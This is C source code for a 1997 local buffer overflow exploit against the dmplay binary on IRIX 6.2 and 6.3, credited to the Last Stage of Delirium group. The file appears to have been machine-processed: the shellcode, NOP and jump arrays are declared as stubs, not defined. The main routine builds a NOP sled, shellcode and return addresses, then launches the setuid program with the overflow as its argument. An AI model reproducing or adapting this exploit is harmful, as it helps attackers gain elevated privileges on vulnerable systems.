
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 int ADRNUM ;
 int NOPNUM ;
 int PCHNUM ;
 int TMPNUM ;
 int execle (char*,char*,char*,int ,char**) ;
 int exit (int) ;
 scalar_t__ jump ;
 int * nop ;
 int printf (char*,...) ;
 int * shellcode ;
 int sprintf (char*,char*,char*) ;
 int strcmp (char*,char*) ;
 int strlen (int *) ;
 unsigned long stub1 () ;
 unsigned long stub2 () ;
 unsigned long stub3 () ;
 unsigned long stub4 () ;
 unsigned long stub5 () ;
 unsigned long stub6 () ;

main(int argc,char **argv){
    char buffer[10000],adr[4],pch[4],tmp[4],*b,*envp[2],display[128];
    int i;

    printf("copyright LAST STAGE OF DELIRIUM oct 1997 poland  //lsd-pl.net/\n");
    printf("/usr/sbin/dmplay for irix 6.2 6.3 IP:17,19,20,21,22,32\n\n");

    if(argc!=3){
        printf("usage: %s {62|63} xserver:display\n",argv[0]);
        exit(-1);
    }

    if(!strcmp(argv[1],"62")){
        *((unsigned long*)adr)=(*(unsigned long(*)())jump)()+10396+32;
        *((unsigned long*)pch)=(*(unsigned long(*)())jump)()+10396+32+900+30540;
        *((unsigned long*)tmp)=(*(unsigned long(*)())jump)()+10396+32+8000;
    }
    if(!strcmp(argv[1],"63")){
        *((unsigned long*)adr)=(*(unsigned long(*)())jump)()+10348+32;
        *((unsigned long*)pch)=(*(unsigned long(*)())jump)()+10348+32+900-84;
        *((unsigned long*)tmp)=(*(unsigned long(*)())jump)()+10348+32+8000;
    }

    sprintf(display,"DISPLAY=%s",argv[2]);
    envp[0]=display;
    envp[1]=0;

    b=buffer;
    for(i=0;i<NOPNUM;i++) *b++=nop[i%4];
    for(i=0;i<strlen(shellcode);i++) *b++=shellcode[i];
    *b++=0xff;
    for(i=0;i<ADRNUM;i++) *b++=adr[i%4];
    for(i=0;i<TMPNUM;i++) *b++=tmp[i%4];
    for(i=0;i<PCHNUM;i++) *b++=pch[i%4];
    *b=0;

    execle("/usr/sbin/dmplay","lsd",buffer,0,envp);
}
